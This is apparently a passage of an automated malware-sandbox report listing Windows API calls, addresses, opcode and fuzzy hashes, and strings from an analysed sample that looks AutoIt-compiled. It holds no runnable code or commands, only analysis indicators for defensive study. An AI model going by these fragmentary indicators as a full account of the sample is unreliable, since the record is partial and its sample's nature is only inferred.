                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: d2851a83c4fc52e5ae4abdf6685acd2f474be624aef5bfaca6bf66eb40873d66
                                                            • Instruction ID: b8e3ed268b0b3948dac547b5df508ddab2f39bc6ca30bcb44f8a2c48ebefea56
                                                            • Opcode Fuzzy Hash: d2851a83c4fc52e5ae4abdf6685acd2f474be624aef5bfaca6bf66eb40873d66
                                                            • Instruction Fuzzy Hash: A1518C35E00615EFCF01EFA4D855AAEBBB4EF48721F144069ED42BB351CB34AE419BA0
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D2EF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 00D2EF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 00D2EFD3
                                                            • _memmove.LIBCMT ref: 00D2EFFD
                                                            • VariantClear.OLEAUT32(?), ref: 00D2F04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D2F078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: bee6981132add03d26ea99f0cad94865db3d3ba1adc096063a31a76fc53661db
                                                            • Instruction ID: 3e1e556e8b60d11bc11dcca9b6ae3569a3a4f8ccab25e3fc3f5e01622f6f4992
                                                            • Opcode Fuzzy Hash: bee6981132add03d26ea99f0cad94865db3d3ba1adc096063a31a76fc53661db
                                                            • Instruction Fuzzy Hash: 885166B5A00219EFCB14DF58D884AAAB7B8FF4C314B15856AED59DB301E334E911CFA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D322A3
                                                            • IsMenu.USER32(00000000), ref: 00D322C3
                                                            • CreatePopupMenu.USER32 ref: 00D322F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00D32355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00D32386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 88346eba549573991a8bfd30e48341a1a31da6faad92a4b4d3688fc99acaf65c
                                                            • Instruction ID: a4da48808277ca495bdedf7e39f51513a5eb4b03593336d125f06e74bc9fa7dc
                                                            • Opcode Fuzzy Hash: 88346eba549573991a8bfd30e48341a1a31da6faad92a4b4d3688fc99acaf65c
                                                            • Instruction Fuzzy Hash: EC517970A01309DBDF21DF68D888BBEBBE5EF45314F18412DE851AB290D3759A44CB71
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00CD179A
                                                            • GetWindowRect.USER32(?,?), ref: 00CD17FE
                                                            • ScreenToClient.USER32(?,?), ref: 00CD181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CD182C
                                                            • EndPaint.USER32(?,?), ref: 00CD1876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 4af0bd772e8cbdec1411cde6c2653434762ec58cc9394c5d45f58b6f91149072
                                                            • Instruction ID: 07685eade1bff500393c69b69e51c71a678b25396c73df6d278e5e71e39c512f
                                                            • Opcode Fuzzy Hash: 4af0bd772e8cbdec1411cde6c2653434762ec58cc9394c5d45f58b6f91149072
                                                            • Instruction Fuzzy Hash: A6418C30504700AFDB11DF25DC84BAA7BE8EB45724F08462AFAA4CB3F1C7309845EB61
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00D44E41,?,?,00000000,00000001), ref: 00D470AC
                                                              • Part of subcall function 00D439A0: GetWindowRect.USER32(?,?), ref: 00D439B3
                                                            • GetDesktopWindow.USER32 ref: 00D470D6
                                                            • GetWindowRect.USER32(00000000), ref: 00D470DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00D4710F
                                                              • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            • GetCursorPos.USER32(?), ref: 00D4713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D47199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: a5983a70650c1aef35a8103186876f9a5371f362f01ef04ef99fe8989397d0cd
                                                            • Instruction ID: f3d556a35907b79f84ab06724cd52a279308b60a6cbd8ae7f917e147d95f643b
                                                            • Opcode Fuzzy Hash: a5983a70650c1aef35a8103186876f9a5371f362f01ef04ef99fe8989397d0cd
                                                            • Instruction Fuzzy Hash: 3B31C472509305ABD720DF14D849F9BB7E9FF88314F040929F985E7291D770EA09CBA2
                                                            APIs
                                                              • Part of subcall function 00D280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D280C0
                                                              • Part of subcall function 00D280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D280CA
                                                              • Part of subcall function 00D280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D280D9
                                                              • Part of subcall function 00D280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D280E0
                                                              • Part of subcall function 00D280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D280F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,00D2842F), ref: 00D288CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D288D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00D288DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D288F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00D2842F), ref: 00D2890A
                                                            • HeapFree.KERNEL32(00000000), ref: 00D28911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 5af7b4eaf1f84c05363ffa31d676685610e9a37a40403a30aa29ce6489d26c15
                                                            • Instruction ID: 4cc275bfa7da46128e7b0c59f25caa65cc2105a9656638427cb6f870663f3890
                                                            • Opcode Fuzzy Hash: 5af7b4eaf1f84c05363ffa31d676685610e9a37a40403a30aa29ce6489d26c15
                                                            • Instruction Fuzzy Hash: 6D11AF35502719FFDB109FA4EC09FBE77A8EB5431AF188029E885D7210CB329940EB70
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D285E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00D285E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D285F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 00D28603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D28632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D28646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 5902b5af569b87c6b4fd07cc9dba8a76db29c27d5aa49ba11607ab3c636805bf
                                                            • Instruction ID: 14f86688def747ebc3ce04fb6e30d70acd4b11557a8e41513a01f323fab390bd
                                                            • Opcode Fuzzy Hash: 5902b5af569b87c6b4fd07cc9dba8a76db29c27d5aa49ba11607ab3c636805bf
                                                            • Instruction Fuzzy Hash: F5115C72501249ABDF118FA4ED49BDE7BA9EF48349F084064FE04E6260C7729D61EB70
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00D2B7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D2B7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D2B7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00D2B7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D2B7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 00D2B7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 74db89f9a39afed4f2f87e4d8a5a0c78e9feab393307481da32473f3546e3a7f
                                                            • Instruction ID: c7c17aee9a0c4d8ebda9fc76d9e8df945bc1960358d383bfdf9f2e7b97c3aff3
                                                            • Opcode Fuzzy Hash: 74db89f9a39afed4f2f87e4d8a5a0c78e9feab393307481da32473f3546e3a7f
                                                            • Instruction Fuzzy Hash: A6012175E00319BBEB109BA69D45A5ABFB8EB58761F044066FE04EB391D6709C10CFA1
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CF0193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00CF019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CF01A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CF01B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00CF01B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CF01C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 633b5b28dec2d57ca2e54986dcd5ef65786e250cfa982229e7c438250b37ed86
                                                            • Instruction ID: 92826dc42c23c4409aa97bad650636b063181fe76b17a7447b388c12bba5faa5
                                                            • Opcode Fuzzy Hash: 633b5b28dec2d57ca2e54986dcd5ef65786e250cfa982229e7c438250b37ed86
                                                            • Instruction Fuzzy Hash: F5016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C8BA41C7F5A864CBE5
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D353F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D3540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00D3541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D3542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D35437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D3543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: cf32c393f970b56578a3c532522c9ccd5c51ec8042fc091b8ffa50249ed212aa
                                                            • Instruction ID: 97f97b4fc2f2987a8ff34418672107382f3530eac6e785d423b9f59ab3c3c014
                                                            • Opcode Fuzzy Hash: cf32c393f970b56578a3c532522c9ccd5c51ec8042fc091b8ffa50249ed212aa
                                                            • Instruction Fuzzy Hash: C6F01D32241758BBE7215BA2AC0DEAB7B7CEBC6B12F000169FE04D61619AA11A0186B5
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00D37243
                                                            • EnterCriticalSection.KERNEL32(?,?,00CE0EE4,?,?), ref: 00D37254
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00CE0EE4,?,?), ref: 00D37261
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00CE0EE4,?,?), ref: 00D3726E
                                                              • Part of subcall function 00D36C35: CloseHandle.KERNEL32(00000000,?,00D3727B,?,00CE0EE4,?,?), ref: 00D36C3F
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D37281
                                                            • LeaveCriticalSection.KERNEL32(?,?,00CE0EE4,?,?), ref: 00D37288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 91e0ea9b4a664d521bc88ce09c7dfa3676ab13a296cc769ada4a0d871fff57b5
                                                            • Instruction ID: 08a3d47b72de3febbcf8be7767dbf5c7049388c6996285edcca71038151e699f
                                                            • Opcode Fuzzy Hash: 91e0ea9b4a664d521bc88ce09c7dfa3676ab13a296cc769ada4a0d871fff57b5
                                                            • Instruction Fuzzy Hash: B6F03ABA541712EBDB122B64ED4C9DB7729EF45703F140531F943D95A0CF765801CA74
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D2899D
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00D289A9
                                                            • CloseHandle.KERNEL32(?), ref: 00D289B2
                                                            • CloseHandle.KERNEL32(?), ref: 00D289BA
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00D289C3
                                                            • HeapFree.KERNEL32(00000000), ref: 00D289CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: 76c8fcb0477d9ae42a6b2cba9d4e4e304b88bf6febb64e6f755f89deabc7c7b4
                                                            • Instruction ID: 6162a12d3292436395fd5df9e60f99adfcb65f8d3e3a05548be4896be3dcf2c4
                                                            • Opcode Fuzzy Hash: 76c8fcb0477d9ae42a6b2cba9d4e4e304b88bf6febb64e6f755f89deabc7c7b4
                                                            • Instruction Fuzzy Hash: 20E0C936004701FBEA012FE1EC0CD06BB69FB993237104230F615C9670CB326421DB60
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D48613
                                                            • CharUpperBuffW.USER32(?,?), ref: 00D48722
                                                            • VariantClear.OLEAUT32(?), ref: 00D4889A
                                                              • Part of subcall function 00D37562: VariantInit.OLEAUT32(00000000), ref: 00D375A2
                                                              • Part of subcall function 00D37562: VariantCopy.OLEAUT32(00000000,?), ref: 00D375AB
                                                              • Part of subcall function 00D37562: VariantClear.OLEAUT32(00000000), ref: 00D375B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 93035b864229226190793127756fd3361c956f8a61fcea953671909d6fcde10b
                                                            • Instruction ID: e9eb1fe54fe2622ab6b795db21d44fc864d7a902268a002fb098b1a039663cba
                                                            • Opcode Fuzzy Hash: 93035b864229226190793127756fd3361c956f8a61fcea953671909d6fcde10b
                                                            • Instruction Fuzzy Hash: 3A919D75A043019FC710EF24C48495EBBE4EF89754F14892EF99A8B361DB31E906DBA2
                                                            APIs
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                            • _memset.LIBCMT ref: 00D32B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D32BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D32C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D32C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: 35a1075cf5a646937f83ced8235526fd98d7e555fd78458510db5dd7eae300d9
                                                            • Instruction ID: 4348c4dbd6777db2815de147222d30d44b3bac1244d5f2c86d5852f6d76908b1
                                                            • Opcode Fuzzy Hash: 35a1075cf5a646937f83ced8235526fd98d7e555fd78458510db5dd7eae300d9
                                                            • Instruction Fuzzy Hash: A751CC71A083009BD7659F28D845A7FB7E8EF89320F181A2DF991D6291DB70CD04D7B2
                                                            APIs
                                                            • GetWindowRect.USER32(0140EE90,?), ref: 00D59863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00D59896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00D59903
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID: @U=u
                                                            • API String ID: 3880355969-2594219639
                                                            • Opcode ID: 9912e374dd4d9168dba3805a22e2860741aab857292c42567f0050441ff12519
                                                            • Instruction ID: c15d9d96ecb066ff64649e4a0fa1306cd507577c978db2e18b309c2562d9c925
                                                            • Opcode Fuzzy Hash: 9912e374dd4d9168dba3805a22e2860741aab857292c42567f0050441ff12519
                                                            • Instruction Fuzzy Hash: 64512C34A00209EFCF10CF64D994AAEBBB5FB55361F148169FC659B2A0D731AD85CFA0
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00D29AD2
                                                            • __itow.LIBCMT ref: 00D29B03
                                                              • Part of subcall function 00D29D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00D29DBE
                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00D29B6C
                                                            • __itow.LIBCMT ref: 00D29BC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID: @U=u
                                                            • API String ID: 3379773720-2594219639
                                                            • Opcode ID: de13fcd2bf041cb81e9a6c5edc2d897f9b9d42d6ec221a0b4ea597f664cd5f5d
